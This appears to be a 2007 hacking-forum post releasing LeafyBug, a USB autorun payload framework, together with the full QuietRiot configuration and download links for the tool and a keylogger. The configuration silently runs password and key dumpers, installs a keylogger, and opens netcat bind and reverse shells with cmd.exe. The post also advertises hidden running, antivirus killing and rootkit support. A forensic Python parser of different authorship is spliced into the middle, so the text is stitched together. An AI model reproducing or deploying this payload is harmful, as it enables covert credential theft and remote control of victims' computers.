
The LeafyBug Framework & QuietRiot v2.1.5 Payload


twsSentinel


The LeafyBug - A new advancement based off the Switchblade PoC.

Update: 6.09.2007

Well guys, I gotta say I'm sorry. The launch of the LeafyBug did not go quite as planned. I've been offered a partnership to a new startup eBusiness. So that has taken 100% of my time this past week. That and school. But I've decided to release the files. However, I did not get to finish all the features I wanted. Specifically the "Loader" application; so I have not included this in the downloads yet. Once done, the loader offers new solutions to the payload execution. First off it detects if .NET is installed on the computer, therefore, if the necessary dependencies are not found, the payload won't run. You can even specify to run a backup payload! It has a few other features to assist in run customization.

Anyway, to no further wait:

http://tws.serveftp.org/software/LeafyBug/LeafyBug.zip  << Framework exe
http://tws.serveftp.org/software/LeafyBug/...ditor.zip  << Payload Editor
http://tws.serveftp.org/software/LeafyBug/...ource.zip  << C# source code for the framework
http://tws.serveftp.org/software/LeafyBug/...ogger.zip  << Small .NET keylogger I made which works on x86 & x64. Does not use WinAPI hooks.

*More info on .NETLogger can be found at: http://www.codeproject.com/useritems/NetKeyLogger.asp. I've released it open-source there.

Please guys, accept my apologies on this release. I really intended to have it 100% finished; all features. I will finish the project, but I can't really give an ETA. The LbLoader application will be released within the next week or so. Those files are being hosted directly off my pc server, so if you want to spread to RapidShare, be my guest. :)


[Image: splash.png]


What is the LeafyBug?

All this time here at Hak5.org, we've had several U3 Payloads come and go. Most of us found one we liked or created our own. However the LeafyBug brings a whole new aspect to the table. The LeafyBug is NOT a payload, it is a payload framework which allows you to extend the Switchblade's concept to a greater extent.

Think of it this way, the LeafyBug is like the payload engine. The payloads themselves are only made up of 2 ini setup files.

[Image: lbeditor1.png]

[Image: lbeditor2.png]

The QuietRiot v2.1.5 is the first payload for this new framework.

;************************************************
;* QuietRiot v2.1.5 Modules
;* LeafyBug Payload
;* Date: 5/25/2007
;* Code: _DmG_
;************************************************

;**********************************************************************************
;* Creating Custom Modules:
;*
;* To create a module you must specify certain variables...
;* =------------------------------------------------------------------------------=
;* |    Var     | Value                                                  | Required |
;* =------------------------------------------------------------------------------=
;*    Enabled  = Enabled or Disabled (write 'true' or 'false')                   YES
;*    Filename = EXE_NAME (name of the actual exe, e.g. keyLogger.exe, netstat)  YES
;*    Mode     = (Choices: 1, 2 or 3)                                            YES
;*             1 = SystemInfo (e.g. netstat, ipconfig). Used for system executables only.
;*             2 = Executable (the exe will be run from the USB device)
;*             3 = Executable (the exe will be copied to the target. If RootKit is
;*                 enabled, it will run under its protection.)
;* =------------------------------------------------------------------------------=
;*    FileDIR  = Path to copy the exe to if Mode == 2 or 3 (default: leave empty)   NO
;*    PreArgs  = Custom export args (this string will be sent after the EXE_NAME    NO
;*               and before the output filename). Nirsoft applications generally
;*               use '/stext' to output into a log, but some apps require something
;*               different. See the "Firefox Passwords" module for an example.
;*    PostArgs = Custom export args                                                 NO
;*               If Mode == 2: this string will be sent after the output filename. See "AdapterWatch".
;*               If Mode == 3: use this string to set the name of the registry key. See "KeyLogger".
;*    x64      = x64 flag. If you know an app is incompatible with an x64 OS, set   NO
;*               this to "true" and the app won't run. (Default: leave empty or
;*               false.) See the "pwdump" module as an example.
;*    x64File  = x64 alternative EXE support. If you have two executables, one for  NO
;*               x86 and one for x64, set the EXE_NAME of the x64 file here.
;*               (See the "CurrentPorts" & "WifiKeys" modules as examples.)
;*    Output   = If the application will output text, leave blank or set to true;  NO
;*               otherwise false. (See "NetCat" or "Keylogger": these programs
;*               don't require the app to finish.)
;* =------------------------------------------------------------------------------=
;**********************************************************************************

;PRE-CONFIGURED VARIABLES: use these to aid in settings.
;
;$DRIVE_DIR$    » Drive the payload executes from.
;$MACHINE_NAME$ » Target computer's name.
;$SYSTEM$       » Target computer's system32 directory.
;$DATE$         » Date of execution.
;$TIME$         » Time of execution.
;$NC_PORT$      » Port number specified in the config file.
;$NC_RVS_IP$    » Reverse shell IP.
;$NC_RVS_PORT$  » Reverse shell port.

[Anti-Virus Killer]
Enabled=false
Filename=
Mode=
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=false

[NetStat]
Enabled=false
Filename=netstat
Mode=1
FileDir=$FILE_DIR$
PreArgs=-n
PostArgs=
x64=
x64File=
Output=

[AdapterWatch]
Enabled=true
Filename=quietriot_awatch.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=/stab
PostArgs=1
x64=
x64File=
Output=

[CurrentPorts]
Enabled=true
Filename=quietriot_cports.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=true
x64File=quietriot_cports64.exe
Output=

[Firefox Passwords]
Enabled=true
Filename=quietriot_FirePassword.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=>>
PostArgs=
x64=
x64File=
Output=

[Internet Explorer]
Enabled=true
Filename=quietriot_iepv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Internet Explorer History]
Enabled=true
Filename=quietriot_iehv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Product Keys]
Enabled=true
Filename=quietriot_ProduKey.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Instant Messenger]
Enabled=true
Filename=quietriot_mspass.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[E-Mail Accounts]
Enabled=true
Filename=quietriot_mailpv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Windows Updates]
Enabled=true
Filename=quietriot_wul.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Protected Storage]
Enabled=true
Filename=quietriot_pspv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[WiFi Keys]
Enabled=true
Filename=quietriot_WirelessKeyView.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=quietriot_WirelessKeyView64.exe
Output=

[KeyLogger]
Enabled=true
Filename=quietriot_NetLogger.exe
Mode=3
FileDir=$FILE_DIR$
PreArgs=-m hour
PostArgs=MSKL
x64=
x64File=
Output=false

[PwDump]
Enabled=true
Filename=quietriot_pwdump.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=>>
PostArgs=
x64=true
x64File=
Output=

[NetCat BindShell]
Enabled=true
Filename=quietriot_nc.exe
Mode=3
FileDir=$FILE_DIR$
PreArgs=-L -p $NC_PORT$ -d -e cmd.exe
PostArgs=MSNCBS
x64=
x64File=
Output=false

[NetCat ReverseShell]
Enabled=false
Filename=quietriot_nc.exe
Mode=3
FileDir=$FILE_DIR$
PreArgs=$NC_RVS_IP$ $NC_RVS_PORT$ -e cmd.exe
PostArgs=MSNCRS
x64=
x64File=
Output=false

[Image: lbeditor3.png]


Oooohhh, Aaahhhhh ... What's so damn special about it?!?

No more shell coding, you have the power of the .NET Framework without even coding one thing. The software is already in place ... just create 2 simple files with the LeafyBug Editor. This project is nearing completion. All code is pretty much done. Just a few more quick features to add. Here's why to migrate to the LeafyBug:

  • Full WinOS compatibility and customization - x86 & x64
  • 100% hidden running ... other payloads would show up on x64
  • LeafyBug SmartTags :: Be able to use the .NET Framework without even coding. Hardcoded SmartTags like ($MACHINE_NAME$, $DATE$) will give you current information on each run.
  • Auto-detects system architecture, allows you to specify 32- and 64-bit apps for each module, and automatically executes the proper one.
  • RootKit ability
  • Easy to create, expand, simplify with no code whatsoever. Add new modules with ease in the editor.
  • Customize each module down to a T how it will run and execute.
  • Installation is simple, place whatever you want in any drive/directory
  • U3 & Non-U3 compliant
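For anyone who finds one of these module files on a recovered drive during an investigation, the header comments above are enough to read it back into a list of what actually ran on the host. The following is an added example (not LeafyBug's or QuietRiot's own code) that parses a constructed excerpt in that format and, for each module that would have executed on an x86 or x64 target, reports the executable used, how it was placed, the Mode 3 registry key name and whether it stays resident; the x64/x64File selection rule is my reading of the header and is marked as an assumption in the code.

```python
import configparser

# Constructed excerpt in the QuietRiot module format (not the original file).
SAMPLE_MODULES = """\
[CurrentPorts]
Enabled=true
Filename=quietriot_cports.exe
Mode=2
x64=true
x64File=quietriot_cports64.exe
[PwDump]
Enabled=true
Filename=quietriot_pwdump.exe
Mode=2
x64=true
[KeyLogger]
Enabled=true
Filename=quietriot_NetLogger.exe
Mode=3
PostArgs=MSKL
Output=false
"""

# Mode meanings taken from the module header comments.
PLACEMENT = {"1": "system executable", "2": "run from USB", "3": "copied to host"}


def triage(module_ini, target_is_x64):
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(module_ini)
    findings = []
    for name in cfg.sections():
        m = cfg[name]
        if m.get("Enabled", "").strip().lower() != "true":
            continue
        exe, alt = m.get("Filename", "").strip(), m.get("x64File", "").strip()
        # Assumed from the header: on x64 an x64File replaces the exe, and a
        # module flagged x64=true with no alternative does not run at all.
        if target_is_x64 and alt:
            exe = alt
        elif target_is_x64 and m.get("x64", "").strip().lower() == "true":
            continue
        mode = m.get("Mode", "").strip()
        findings.append({
            "module": name, "exe": exe, "placement": PLACEMENT.get(mode, "unknown"),
            # Mode 3 uses PostArgs as the registry key name; Output=false marks a
            # fire-and-forget module that stays resident after the payload run.
            "registry_key": m.get("PostArgs", "").strip() if mode == "3" else None,
            "resident": m.get("Output", "").strip().lower() == "false",
        })
    return findings
```

Running it against the sample with `target_is_x64=True` drops PwDump (flagged x64 with no alternative) and swaps CurrentPorts to its 64-bit binary, which is the host-side picture an analyst would verify against file-system and registry evidence.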


Hey guys .. I'll release it either tomorrow, or in the next couple days. There's a couple of things I'd like to see implemented. Also, I have completely lost my U3 Drive (OMG!), which sucks. I have no idea what happened to it. So I will be unable to test any U3 capabilities or create a U3 Package Installer. Hopefully I'll buy a new drive within a week.

I'm also still undecided about releasing a rootKit with the QuietRiot. The leafybug has the ability to use the hxdef RK, but I might just leave it up to the individuals to modify the HxDef rootkit. But we'll see.

On another note, I'm working with the creator of PwDump v6.5 (foofus.net) to create an x64 compatible version. I will release the Lb/QuietRiot before this gets built, but hopefully an x64 version will be out soon. If you've ever tried to run it in a 64-bit environment, the application hangs.

Anyways ... thanks for the support guys. Sorry for the wait!
